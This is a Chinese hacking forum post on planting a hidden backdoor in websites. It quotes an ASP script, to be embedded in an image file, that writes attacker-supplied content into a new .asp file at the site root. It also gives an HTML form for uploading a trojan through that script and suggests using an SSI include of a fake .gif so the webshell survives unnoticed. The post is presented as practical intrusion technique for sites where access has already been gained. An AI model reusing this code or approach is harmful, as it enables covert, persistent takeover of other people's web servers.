留网页后门又一招~~
关于臭要饭的! 的脚本插入图片我没有试验成功,俺比较愚钝~~
但是发现他说的是一个好办法!
这里引用他教程里的原文:
-----------------------------------------------------
我的插入图片的脚本:
<%
If Request("a")<>"" Then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
fdata = request("a")
Set objCountFile = objFSO.createTextFile(server.mappath("/kxlzx.asp"),True)
objCountFile.Write fdata
End If
%>
这段代码主要就是在网站根目录下生成一个kxlzx.asp文件。(我改了)
文件内容是由我们提交的数据.用request("a")来获取的。
这段代码插入到图片中去。
本地自己构建一个提交表单向ASP文件提交(加入图片那个文件)
表单文本框输入内容名称是:a
表单代码:
<form method="POST" action="插入木马图片的ASP文件地址" target=_new>
<textarea rows="8" name="a" cols="75">输入木马的内容</textarea><br>
<input type="submit" value="提交" name="B1">
</form>
--------------------------------------------------------
我按照他说的做,用工具生成木马,却出现:在页面上很多乱码类东西.
这不是不打自招么?
所以,我没有成功,不过他说的是好办法!
反正只要一句话
<!--#include file="aaa.gif" -->
放在任何一个asp文件中就可以了,那就好!
记得我们曾有过吧asp文件改名为gif然后再改回来的入侵方式,现在套用前面,不过不用改回来了~
把<!--#include file="aaa.gif" -->
插入进去不就得了??
同样的道理,想想吧,流行的建站程序,还有流行的论坛,哪一个不是gif大堆?
我们放进去一个假的,谁知道???
管理员还会闲着没事做打开几百个图片慢慢欣赏?
除非是黄的~~~~
呵呵!
你只要有了上传文件,和更改部分asp文件内容的权利。
我们可以执行他教程里下面的部分。首先条件是我们拿到了webshell,或者是在某些管理后台可以更改某一个asp叶面,都行。灵活运用嘛~